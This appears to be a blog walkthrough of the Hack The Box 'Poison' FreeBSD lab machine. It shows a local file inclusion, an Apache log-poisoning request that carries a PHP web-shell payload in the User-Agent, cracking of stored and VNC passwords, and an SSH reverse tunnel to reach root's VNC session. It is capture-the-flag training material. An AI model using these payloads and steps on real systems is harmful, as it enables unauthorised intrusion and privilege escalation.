Hack The Box - Poison Writeup

4 minute read

image1

Description:

This a medium rated freebsd machine. Easy user shell and an interesting privilege escalation vector.

Enumeration

Add poison.htb to hosts and start an nmap scan.

Nmap

# Nmap 7.80 scan initiated Wed Sep  2 10:41:42 2020 as: nmap -sS -p- -T4 -oN _full_nmap -vvvv poison.htb
Nmap scan report for poison.htb (10.10.10.84)
Host is up, received echo-reply ttl 63 (0.30s latency).
Scanned at 2020-09-02 10:41:42 IST for 902s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
# Nmap done at Wed Sep  2 10:56:44 2020 -- 1 IP address (1 host up) scanned in 902.18 seconds

Visiting port 80 give us a page that can run php scripts.

image1

User Shell

The page seems to be vulnerable to lfi.

We have two methods to get shell, directly using lfi to read file and by poisoning the apache log.

Method 1 (listfile.php)

Using listfiles.php shows a password backup file and we can read the file directly.

image1

Method 2 (Log poisoning)

The apache log file is stored at /var/log/httpd-access.log.

Accessing the file shows that the user-agent is being logged.

image1

All we have to do is add the php code to be executed in our header. The following payload can be used for command execution.

GET /browse.php?file=/var/log/httpd-access.log&cmd=id HTTP/1.1

Host: poison.htb

User-Agent: <?php system($_REQUEST['cmd']); ?>

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

image1

And we can see that our payload has been executed. Change the payload to get a shell.

After getting a shell we can read the contents of pwdbackup.txt.

Decoding password

We have a password that has been bas64 encoded 13 times. Decode it using python.

image1

>>> import base64
>>> pwd = open('./pwd', 'r').read().strip()
>>> for i in range (13):
...     pwd=base64.b64decode(pwd)
...
>>> print(pwd)
Charix!2#4%6&8(0

We can ssh into the box.

kali@kali:~/Desktop/htb/poison$ ssh charix@poison.htb
Password for charix@Poison:
Last login: Wed Sep  2 15:20:22 2020 from 10.10.14.21
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017

Welcome to FreeBSD!

Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/

Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.

Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier

Edit /etc/motd to change this login announcement.
If you want df(1) and other commands to display disk sizes in
kilobytes instead of 512-byte blocks, set BLOCKSIZE in your
environment to 'K'.  You can also use 'M' for Megabytes or 'G' for
Gigabytes.  If you want df(1) to automatically select the best size
then use 'df -h'.
charix@Poison:~ % id
uid=1001(charix) gid=1001(charix) groups=1001(charix)

There is a zip archive named secret that is encrypted with a password. It can be extracted using the ssh password of charix

charix@Poison:~ % file secret.zip
secret.zip: Zip archive data, at least v2.0 to extract

kali@kali:~/Desktop/htb/poison$ unzip secret.zip
Archive:  secret.zip
[secret.zip] secret password:
replace secret? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
 extracting: secret
kali@kali:~/Desktop/htb/poison$ file secret
secret: Non-ISO extended-ASCII text, with no line terminators
kali@kali:~/Desktop/htb/poison$ cat secret
[|Ֆz!

The extracted file contains some non printable characters. No idea what it is.

Root Shell

Checking the listening ports, we can see that tightvnc is listening on internal interface.

$ sockstat -4 -l
USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
www      httpd      15161 4  tcp4   *:80                  *:*
root     sendmail   663   3  tcp4   127.0.0.1:25          *:*
www      httpd      662   4  tcp4   *:80                  *:*
www      httpd      661   4  tcp4   *:80                  *:*
www      httpd      660   4  tcp4   *:80                  *:*
www      httpd      659   4  tcp4   *:80                  *:*
www      httpd      658   4  tcp4   *:80                  *:*
root     httpd      646   4  tcp4   *:80                  *:*
root     sshd       641   4  tcp4   *:22                  *:*
root     Xvnc       550   1  tcp4   127.0.0.1:5901        *:*
root     Xvnc       550   3  tcp4   127.0.0.1:5801        *:*
root     syslogd    411   7  udp4   *:514                 *:*

While doing some research on vnc, I came upon this.

Decrypting VNC password

Default password is stored in: ~/.vnc/passwd

If you have the VNC password and it looks encrypted (a few bytes, like if it could be and encrypted password). It is probably ciphered with 3des. You can get the clear text password using https://github.com/jeroennijhof/vncpwd Port forward the local port to our system using ssh

So I guess the secret file is the vnc password file and it can be decrypted.

kali@kali:~/Desktop/htb/poison$ git clone https://github.com/jeroennijhof/vncpwd.git
Cloning into 'vncpwd'...
remote: Enumerating objects: 28, done.
remote: Total 28 (delta 0), reused 0 (delta 0), pack-reused 28
Unpacking objects: 100% (28/28), done.
kali@kali:~/Desktop/htb/poison$ cd vncpwd/
kali@kali:~/Desktop/htb/poison/vncpwd$ make
gcc -Wall -g -o vncpwd vncpwd.c d3des.c
kali@kali:~/Desktop/htb/poison/vncpwd$ ls
d3des.c  d3des.h  LICENSE  Makefile  README  vncpwd  vncpwd.c
kali@kali:~/Desktop/htb/poison/vncpwd$ ./vncpwd ../secret
Password: VNCP@$$!

So now forward the local port to our system using ssh. More about this can be found here

  1. Start ssh on kali
  2. Forward port 5901 using ssh -f -N kali@<ip> -R 5901:localhost:5901
  3. Connect to vnc using the password file

On victim machine

$ ssh -f -N kali@10.10.14.21 -R 5901:localhost:5901
kali@10.10.14.21's password:

On our kali machine.

kali@kali:~/Desktop/htb/poison$ vncviewer -passwd secret 127.0.0.1::5901
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
Desktop name "root's X desktop (Poison:1)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

image1

And we are root!

Tags:

Categories:

Updated:

You may also enjoy

Blind RCE and DNS Exfilteration

6 minute read

Description: I was doing a security testing against a web server running WebLogic. A potential RCE due to CVE-2019-2725 was reported and I was verifying it. I was following the PoC given here.

Hack The Box - Forest Writeup

8 minute read

Description: Forest is a easy level box that can be really helpful to practice some AD related attacks. Although rated as easy, it was a medium box for me considering that all attack vectors where pretty new to me.